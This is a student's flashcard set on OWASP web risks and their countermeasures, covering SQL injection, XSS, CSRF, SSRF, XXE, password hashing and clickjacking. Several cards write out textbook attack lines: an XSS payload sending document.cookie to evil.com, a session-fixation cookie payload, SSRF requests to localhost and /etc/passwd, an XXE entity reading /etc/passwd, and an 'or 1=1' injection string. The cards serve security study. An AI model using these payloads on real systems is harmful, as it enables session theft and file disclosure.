OWASP part 2 Flashcards
Exam question:
Which security guiding principle is related to the blacklisting countermeasure?
Be reluctant to trust
Exam question:
Which security guiding principles are related to the encrypt sensitive information countermeasure?
Remember that hiding secrets are hard
What is the security issue of cookie-based tokens?
The server can only see the cookie name and value, not from which domain it was sent.
Only sees:
Cookie: NAME=VALUE
Fill in the black: All input is ___
Evil
Which vulnerability is related to session fixation attack?
When servers escalates anonymous session tokens without changing their value.
What can an attacker achieve with SQLi?
Modification/destruction of data
Unautherized access to data, steal information
Privilege escalation
Expose database structure
DoS
What are possible countermeasures against SQLi?
Prepared statements, bind variables
Mitigating impact
Not recommended to only do:
- escape
- blacklist
- whitelist
What does it mean to bind variables when mitigating SQLis?
To put one or more placeholders in the text of the SQL statement, then specify the variable (value to be used) for each placeholder.
What are the 8 most common OWASP risk at this point in time?
More injection attacks - XSS
Broken access control - CSRF
SSRF
Security misconfiguration - XML external identities
SW and data integrity failures - insecure deserialization
Identification and auth failure - Broken authentication
Security logging and monitoring failures - insufficient logging and monitoring
HTML security issues - Clickjacking
What type of session management attacks can be achieved using XSS?
Session token theft
Session fixation
What is XSS?
Can occur when JS code is sent as user input and the server does not sanitize the input and echo’s it directly on the html page. This way, the user input will be interpreted as code and executed.
How can XSS be used to steal tokens? (Token theft)
An attacker finds out that http://example.com/query? is vulnerable to XSS.
The attacker knows that user A uses this page alot.
The attacker sends the following link to the user:
http://example.com/query?name=
new Image().src = "http://evil.com/log?c='+document.cookie;
The attacker lures the user to click this link
When the user clicks the link, the script is echoed back to the user’s browser and executed. The user’s anonymous or logged-in cookie at example.com is logged at evil.com
How can XSS be used in session fixation attacks?
The attacker sends a request to example.com and receives back an anonymous token from the server.
At the same time, A visits the same site and receives their own anonymous cookie.
Then, the attacker sends the link to A:
http://example.com/query?name=
document.cookie = "exampleSiteToken=attackersToken"
Attacker lures A to click this link
Later, A logs in to the example.com site. If the credentials are valid, the server escalated the anonymous token, with the attackers value, to a logged-in token.
The attacker can now use their token to impersonate A.
What are some usual sources of untrusted input?
Query
User/profile page
Forum/Message board
Blogs
What are the 2 types of XSS attacks?
Reflected XSS
Stored XSS
What is reflected XSS?
JS is injected into a request
The JS code is reflected immediately in the response
What is stored XSS?
Script injected into a request, then stored somewhere on the server.
Reflected repeatedly, making it more easily spread.
How can XSS be mitigated?
Sanitize input data
Sanitize or escape data that is inserted into a web page.
Don’t rely on sanitizing only on the client side, as requests can be intercepted. Always sanitize on the server side as well.
What is the flow of CSRF?
User logs in and gets a session ID from the server:
Cookie: sessionID=1234
The user has this session open, when visiting a new site: evil.com
This site contains an image, that is not a real image, but rather refers to a transfer site of the bank
<img></img>
When the image is reflected back to the browser, the link is executed, effectively sending a request on behalf of the user. The session ID of the user is used to complete the transaction.
The attacker needs to understand how transaction requests are made from the banking app, to be able to forge a correct request.
What is the vulnerability that makes CSRFs possible?
Session management that only relies on a cookie. And the server is not able to distinguish between real and forged requests.
How can you identify if a website is vulnerable to CSRF?
Identify URL to test for CSRF. For example test if you are able to delete an account on a website using csrf.
Set up different website that contains:
<img src=”http://example.com/account/del”
Create a dummy account on the original website, and log in.
With the session active, open the HTML page we just created in the same browser.
If the account was deleted -> is vulnerable
How can CSRF be mitigated? (4)
Extra authentication when doing transactions: re-authenticate
CSRF tokens(action tokens)
SameSite cookies (browser setting): Prevents cross-site cookie usage
Referer-based validation: Verifies that the request originates from own domain.
How can we mitigate CSRF using CSRF tokens?
Combine tokens in the cookie and the hidden-form field. Add action token as hidden field to genuine forms. This token should not be predictable.
When a user logs in it gets a sessionID. When the user asks for the transfer form, a CSRF token is created and put in a hidden field. The form is then returned to the user.
Whenever a user issues a request from the form, both the cookie and the CSRF token are sent. The server checks both.
What is SSRF?
A browser is talking to a web app that is in a trust zone with other servers or services. The server can access backend services.
The attacker sends a request to the server, which is then forwarded within the trusted zone. This request executes with the rights of the web server.
Give 2 examples of SSRF requests
GET /?url=http://127.0.0.1/admin/
GET /?url=file:///etc/passwd
How can SSRF be countermeasured?
There is no universal fix, as it depends on the server-side implementation (application functionality and business requirements).
Some approaches:
- Whitelisting on server side (What IP addresses can pass through)
- Handle responses from the server: e.g. make sure not to send files or passwords
- Authentication between server and internal services
- Network segregation
What is XML External Entities in regards to security misconfigurations?
When we have code that requires an XML parser.
<!ENTITY name SYSTEM “URI”>
!ENTITY: External entity declaration, name of the external entity
SYSTEM: Private/local
URI: Location of the variable
External entities refers to things that are used often in multiple documents in different parts of code. Used so that the same information does not need to be fetched multiple times from the different places.
Describe XML External Entities (XXE) attacks
Attack where an attacker uses malicious XML input that references an external entity that is processed by a weakly configures XML parser.
Normal input:
Input: <test>Hello</test>
Output after XML parsing: Hello
Malicious:
Input:
<!DOCTYPE test [!ENTITY xxefile SYSTEM “file://etc/passwd”>]><test>&xxefile</test>
Output:
Content of passwd file
How can XEE be countermeasured?
Disable processing/parsing of XML external entities and DTD (Document Type Definition)
Use safe parsing libraries, or defused parsing.
Describe Insecure deserialization in regards to Software and data integrity failures
Attacker can tamper with network data and inject malicious payload in a serialized data stream, e.g. SQLi payload.
Data stream:
{“ID”: “ user1’ or 1=1”, “Course”:”4237”, “Grade”: “C”}
Server-side code:
“SELECT Grade FROM student WHERE user=”user 1’ or 1=1”
How can insecure serialization be countermeasured?
Don’t accept serialized objects from untrusted sources.
Integrity checks: e.g. digital signatures on serialized objects
Isolate and run code that serializes in low privilege environments
Use JSON: data-only serialization format.
What is the difference between identification and authentication?
Identification: An entity telling who they are
Authentication: An entity proving/verifying that they are the identity they claim to be
How can authentication be done?
3 ways:
- Something you know
- Something you have
- Something you are
How can “Something you know” be implemented, and what are the advantages/disadvantages
Password, security questions
Pros:
- Simple to implement, understand and use
Cons:
- Easy to crack, and forget
How can “Something you have” be implemented, and what are the advantages/disadvantages
BankID, mobile phone (1 time password)
Pros:
- Hard to crack, as long as not lost
Cons:
- Thing can be broken, stolen or forged
- If loose phone - won’t be able to get a 1TP for a while
– Strength of auth depends on the difficulty of forging
How can “Something you are” be implemented, and what are the advantages/disadvantages
Biometrics: fingerprint, palm scan, facial recognition, usage patterns, signature dynamics
Pros:
- Hard to crack
- Hard to steal (?): We leave our biometrics everywhere: fingerprints are not so hard to steal anymore, recorded voices/faces can be used to forge voice or facial recognition
Cons:
- Accuracy: False negative/False positives
- Social acceptance and privacy issues
- Key management
- Hard to replace
How can passwords be cracked?
Vulnerable password storage:
Passwords are often stored on files with the following format. If an attacker gets the file, all users are comprimized.
Username:password
What is a countermeasure against password cracking?
Hashing: Stored hashed version of the password, not the plaintext version
In storage:
username: 923786t8732kdsbhy77832bwd11k
Why shouldn’t the client hash the password?
If someone gets access to the hash database, they can use the hash to enter the database from the client. The server would not be able to distinguish between the hash and the entries in the database.
Never trust the client. So do other security measures to protect the password in transit, rather than hashing.
How can hashed passwords be attacked?
Dictionary attacks:
- Precompute the hash of a long list of common passwords (people tend to use the same passwords)
- Compare what is in the password file to these.
- This can be really quickly done offline when a password file is stored. Comparison can be run on a very fast computer.
What is a good defence against dictionary attack?
Concatenate the password with a random salt:
password || 1212
Hash this
Store the hash with the salt:
username:bufeiwoiu23390234r67823:1212
When is salting not a good defence against dictionary attacks?
Against offline attacks. When the attacker gets access to the password file where both the hashed password and the salt is used. Salt is stored in plaintext in the password file. This way the attacker can just use the salt they have found and run the same attacks.
When is salting a good defence against dictionary attacks?
Against online attacks, where an attacker does not have access to the record containing the salt (file or db record).
Why do we store the salt in plaintext, and not a hashed version?
You need the original salt to compare the password with the stored hashed version of the password.
What is a rainbow table?
The precomputed hash tables of common passwords
Why is dictionary attacks not as efficient when using a salt?
Need to compute a rainbow table for every salt.
How can we make hashed passwords even more secure?
Using a pepper.
A pepper is a secure value that is appended to the password before it is hashed. Unlike salts, the pepper is the same for every user and is not saved in the password file. The pepper is stored in an encrypted form in another secure place.
hash(password || pepper|| salt)
What are the benefits of using peppers in password storage?
Makes the password longer and more complex.
Defend against offline attacks better:
- pepper is stored encrypted in another location
- If the attacker steals the password file, the pepper is still unknown
Why is still additional password security required, besides salt and pepper?
Dictionary attacks are still possible, just requires more computing power
What are some additional password security techinques?
Combine password security with other authentication countermeasures such as:
- Filtering
- Limiting the number of logins
- Aging password
- 2FA or multichannel auth
- Last login/protective monitoring
- 1 time password
What is password filtering
When creating a password, it must meet some minimum requirements.
Length, mix of characters, case
Measure the strength: weak, medium, strong
What is Limiting the number of logins?
Lockout user after a certain number of login-trials
This is inconvenient to forgetful user
What attack can be done on a system that limits the number of logins?
DoS: Lockout legitimate users by attempting login until they are locked out
What is login throttling?
Each time login fails, the user must wait a longer time to try again. Inconvenient, but prevents users from being locked out
What is last login/protective monitoring?
Notify users of suspicious login (login date, time, location)
Educate users to pay attention
Educate users to report possible attacks
What are aging passwords?
Policy that requires users to change passwords every now and then.
Cons:
- People tend to forget passwords more often
- Users find workarounds: repeat passwords, incrementing, easy to guess adjustments
What are one-time passwords?
Login with different password each time
Through SMS or device (e.g. bankID)
Work as long as the user has access to the devie
What is 2FA, two-channel
Combines 2 or more ways of authentication
Often:
password + 1 time passwords
password + bankID
What is a common password attack vector?
Go through the forgot-password functionality. As a developer, need to think about how this process can be made safe
What are some common ways of doing password recovery?
URL tokens: Expiration date is important
PINs
Offline methods: e.g. show up at office to confirm password
Security questions (not a good idea, a lot of these information is available to the public)
What is the tradeoffs in authentication?
Authentication security and usability
What is CAPTCHA and reCAPTCHA
Completely Automated Public Turing test to tell Computers and Humans Apart
Used to block bots. Machines are not good at solving captchas, but are getting better with machine learning.
Name 6 authentication and password test cases
Testing vulnerable remember password
Testing for browser cache weakness
Testing for weak password policy
Testing for weak security question/answer
Testing for weak password change or reset functionality
Testing for waker auth in alternative channel
What is Insufficient logging and monitoring, in regards to security logging and monitoring?
Typical vulnerabilities: logins, failed logins, high-value transactions are not logged at all
Warning and errors generate no, inadequate or unclear log messages
Logs are not monitored properly
Logs are only stored locally. This makes it easier for an attacker to wipe the logs, and makes it difficult to monitor the logs properly.
Appropriate alerting thresholds and response escalation processes are not in place or effective.
Need to have a real-time response. Systems are weak if they are unable to detect, escalate, or alert for active threats in real. time or near real time.
What is Clickjacking in regards to HTML security issues?
When someone puts an invisible website on top of a website with legit content, as an iframe.
The user might think they are clicking on a button, when they actually are clicking on the iframe.
Use iframe and opacity
Top layer: What attacker wants you to click on, opacity 0
Bottom layer: What the user sees, opacity 1
What are some countermeasures against click jacking?
“X-Frame-Options: deny” Use this in the header of the legit site, this completely disables the loading of the page in a frame
